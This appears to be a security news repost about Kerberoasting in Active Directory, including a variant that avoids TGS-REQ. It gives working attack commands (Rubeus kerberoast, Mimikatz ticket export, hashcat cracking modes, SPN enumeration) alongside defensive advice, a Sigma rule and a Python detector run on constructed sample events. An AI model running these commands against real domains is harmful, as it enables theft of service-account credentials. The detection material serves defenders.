Kerberoasting is a widely used technique for extracting service account credentials in Active Directory environments. The classic form requests Ticket Granting Service (TGS) tickets for accounts that carry a servicePrincipalName, then cracks the service-key-encrypted part of each ticket offline. A newer variant obtains the service ticket without ever sending a TGS-REQ, which sidesteps the detections most environments rely on (event 4769 on the domain controller).
Read the full article here: rastamouse.me
You Should Know:
1. Traditional Kerberoasting Steps
To understand the evolution, let's first review the classic Kerberoasting method:
1. Request a service ticket for a target SPN (this sends a TGS-REQ to the KDC and leaves the ticket in the local cache):
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dc01.corp.local"
Or using Rubeus, which enumerates SPN-bearing accounts, requests a ticket for each and writes the crackable hashes directly:
Rubeus.exe kerberoast /outfile:hashes.txt
2. Extract cached tickets with Mimikatz (needed only for the PowerShell path above; the exported .kirbi files must be converted, e.g. with kirbi2john from John the Ripper, before hashcat will accept them):
Invoke-Mimikatz -Command '"kerberos::list /export"'
3. Crack with Hashcat (mode 13100 is for RC4, etype 23, tickets; AES tickets need mode 19600 for AES128 or 19700 for AES256):
hashcat -m 13100 hashes.txt rockyou.txt
2. Kerberoasting Without TGS-REQ
The classic flow needs one TGS-REQ per target, and that is exactly what detections key on. Kerberos has only two exchanges with the KDC, so "without TGS-REQ" means the service ticket is obtained through the AS exchange instead: no 4769 is generated on the domain controller, and the request surfaces as a 4768 (AS-REQ) event instead. Target selection is unchanged: SPN-bearing accounts are still enumerated over LDAP before any ticket is requested.
Enumerate SPN-bearing accounts with PowerShell (krbtgt is excluded, since its ticket cannot be cracked usefully):
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | Where-Object { $_.SamAccountName -ne 'krbtgt' } | Select-Object SamAccountName, ServicePrincipalName
Targeted roasting with Rubeus (note that this still sends a TGS-REQ per account; /ldapfilter only narrows the target set, here to accounts with adminCount=1, and /nowrap prints each hash on a single line for hashcat):
.\Rubeus.exe kerberoast /ldapfilter:"admincount=1" /nowrap
3. Defensive Measures
- Monitor LDAP searches that filter on servicePrincipalName (visible through domain controller LDAP query logging, such as NTDS event 1644 with the Field Engineering diagnostic raised, or an identity-monitoring product); a client that enumerates every SPN in the forest is the first step of both variants.
- Restrict service accounts to AES by setting msDS-SupportedEncryptionTypes so the KDC never issues RC4 tickets for them; AES tickets crack far more slowly (hashcat 19600/19700 versus 13100) and an attacker can no longer request an RC4 downgrade. Where the service supports it, use a group Managed Service Account, whose long, automatically rotated password is not practically crackable.
- Enforce long passwords (25+ characters) for remaining service accounts, for example with a fine-grained password policy.
Detect with a Sigma rule (the original rule keyed on every RC4 4769; a per-account threshold, a timeframe and a filter for krbtgt and computer-account services are added so it fires on bursts rather than on every RC4 ticket):
title: Suspicious Kerberoasting Activity
description: Detects many RC4 (0x17) TGS requests by one account in a short time
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4769
    TicketEncryptionType: 0x17
  filter_krbtgt:
    ServiceName: 'krbtgt'
  filter_computer:
    ServiceName|endswith: '$'
  timeframe: 5m
  condition: selection and not 1 of filter_* | count() by TargetUserName > 5
This rule only sees the TGS exchange. A ticket obtained through the AS exchange never produces a 4769; for that variant, watch 4768 events whose Service Name is anything other than krbtgt.
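The detection logic above, run over constructed sample events, as an added example that is not part of the original post or the linked article. It implements both checks: the burst rule (more than five distinct RC4 service tickets for one account within five minutes, ignoring krbtgt and computer-account services) and the AS-exchange check (a 4768 whose ServiceName is not krbtgt). The log line format, the account names and the assumption that the KDC records the requested service name in the 4768 ServiceName field are all this example's own.

```python
"""Kerberoasting detection over Windows Security events 4768/4769.

Added example; the log lines below are constructed, not real telemetry.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # TicketEncryptionType for RC4 tickets (hashcat -m 13100)

# Constructed sample events: "<UTC time> <EventID> key=value ...".
# Field names follow the 4768/4769 event XML. alice bursts through six user
# service accounts (plus a computer account, which must be ignored), bob uses
# AES, carol spreads six RC4 requests over hours, mallory gets a service
# ticket straight from an AS-REQ (assumed to appear as a non-krbtgt 4768).
SAMPLE_LOG = """\
2024-05-01T09:00:00Z 4768 TargetUserName=alice ServiceName=krbtgt IpAddress=10.0.0.5
2024-05-01T09:00:10Z 4769 TargetUserName=alice@CORP.LOCAL ServiceName=DC01$ TicketEncryptionType=0x12 IpAddress=10.0.0.5
2024-05-01T09:01:00Z 4769 TargetUserName=alice@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.0.0.5
2024-05-01T09:01:01Z 4769 TargetUserName=alice@CORP.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.0.0.5
2024-05-01T09:01:02Z 4769 TargetUserName=alice@CORP.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=10.0.0.5
2024-05-01T09:01:03Z 4769 TargetUserName=alice@CORP.LOCAL ServiceName=svc_sccm TicketEncryptionType=0x17 IpAddress=10.0.0.5
2024-05-01T09:01:04Z 4769 TargetUserName=alice@CORP.LOCAL ServiceName=svc_exch TicketEncryptionType=0x17 IpAddress=10.0.0.5
2024-05-01T09:01:05Z 4769 TargetUserName=alice@CORP.LOCAL ServiceName=svc_sap TicketEncryptionType=0x17 IpAddress=10.0.0.5
2024-05-01T09:01:06Z 4769 TargetUserName=alice@CORP.LOCAL ServiceName=FS01$ TicketEncryptionType=0x17 IpAddress=10.0.0.5
2024-05-01T09:05:00Z 4769 TargetUserName=bob@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x12 IpAddress=10.0.0.6
2024-05-01T09:05:01Z 4769 TargetUserName=bob@CORP.LOCAL ServiceName=svc_web TicketEncryptionType=0x12 IpAddress=10.0.0.6
2024-05-01T10:00:00Z 4769 TargetUserName=carol@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.0.0.7
2024-05-01T10:30:00Z 4769 TargetUserName=carol@CORP.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.0.0.7
2024-05-01T11:00:00Z 4769 TargetUserName=carol@CORP.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=10.0.0.7
2024-05-01T11:30:00Z 4769 TargetUserName=carol@CORP.LOCAL ServiceName=svc_sccm TicketEncryptionType=0x17 IpAddress=10.0.0.7
2024-05-01T12:00:00Z 4769 TargetUserName=carol@CORP.LOCAL ServiceName=svc_exch TicketEncryptionType=0x17 IpAddress=10.0.0.7
2024-05-01T12:30:00Z 4769 TargetUserName=carol@CORP.LOCAL ServiceName=svc_sap TicketEncryptionType=0x17 IpAddress=10.0.0.7
2024-05-01T12:45:00Z 4768 TargetUserName=mallory ServiceName=MSSQLSvc/sql01.corp.local IpAddress=10.0.0.9
"""


def parse_event(line):
    """Parse one sample line into a dict with a datetime 'time' and int 'EventID'."""
    ts, event_id, *fields = line.split()
    ev = {"time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "EventID": int(event_id)}
    for field in fields:
        key, _, value = field.partition("=")
        ev[key] = value
    if "TicketEncryptionType" in ev:
        ev["TicketEncryptionType"] = int(ev["TicketEncryptionType"], 16)
    return ev


def parse_log(text):
    return [parse_event(line) for line in text.splitlines() if line.strip()]


def is_roastable_service(name):
    """krbtgt and computer accounts (trailing $) are not useful Kerberoast targets;
    skipping them removes most of the noise a bare 4769/RC4 rule would flag."""
    lowered = name.lower()
    return not (lowered.startswith("krbtgt") or lowered.endswith("$"))


def find_kerberoast_bursts(events, threshold=5, window=timedelta(minutes=5)):
    """Return {requesting account: set of service accounts} for every account that
    obtained more than `threshold` distinct RC4 service tickets inside one `window`."""
    by_user = defaultdict(list)
    for ev in events:
        if (ev["EventID"] == 4769 and ev.get("TicketEncryptionType") == RC4_HMAC
                and is_roastable_service(ev["ServiceName"])):
            by_user[ev["TargetUserName"]].append((ev["time"], ev["ServiceName"]))
    hits = {}
    for user, reqs in by_user.items():
        reqs.sort()  # sliding window over the account's requests in time order
        for i, (start, _) in enumerate(reqs):
            services = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(services) > threshold:
                hits[user] = services
                break
    return hits


def find_as_req_service_tickets(events):
    """4768 (AS-REQ) events whose Service Name is not krbtgt: a service ticket issued
    without any TGS-REQ, which the 4769 rule can never see.
    ASSUMPTION: the KDC records the requested service name in the 4768 ServiceName field."""
    return [ev for ev in events
            if ev["EventID"] == 4768 and not ev.get("ServiceName", "krbtgt").lower().startswith("krbtgt")]


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    for user, svcs in find_kerberoast_bursts(evs).items():
        print(f"[kerberoast burst] {user}: {len(svcs)} RC4 service tickets {sorted(svcs)}")
    for ev in find_as_req_service_tickets(evs):
        print(f"[AS-REQ service ticket] {ev['TargetUserName']} obtained {ev['ServiceName']} via 4768")
```

Counting distinct service accounts rather than raw 4769 events is deliberate: a legitimate client re-requesting the same ticket produces repeated events for one service, while a Kerberoast sweep touches many services once each. The timeframe is what separates carol's slow, ordinary usage from alice's sweep even though both reach six RC4 tickets.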
What Undercode Say
Kerberoasting remains a critical threat to Active Directory security. The shift toward stealthier techniques (obtaining the service ticket through the AS exchange, which leaves no 4769) makes detection harder. Defenders must:
- Audit service accounts regularly: which accounts carry SPNs, which still allow RC4, and which hold privileged group membership.
- Use tools like BloodHound to identify the attack paths a cracked service account password opens up.
- Deploy SIEM rules that cover both exchanges: bursts of RC4 4769 events per account, and 4768 events whose Service Name is not krbtgt, alongside abnormal LDAP SPN enumeration.
Linux/Win Commands for Analysis:
- Check Kerberos Tickets (Linux):
klist
- Enable Kerberos client-side logging (Windows; writes Kerberos errors to the System event log, useful for troubleshooting the client rather than for detection on the DC):
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters" -Name "LogLevel" -Value 1
- Find SPNs via LDAP (Linux; replace USER with a domain account, the filter needs the wildcard to match any value):
ldapsearch -H ldap://dc01.corp.local -D "USER@corp.local" -W -b "dc=corp,dc=local" "(servicePrincipalName=*)" sAMAccountName servicePrincipalName
A refined detection strategy combining log analysis of both Kerberos exchanges, encryption upgrades to AES, and least-privilege service accounts is essential to mitigate modern Kerberoasting attacks.
Reference: rastamouse.me
Reported By: Florian Hansemann – Hackers Feeds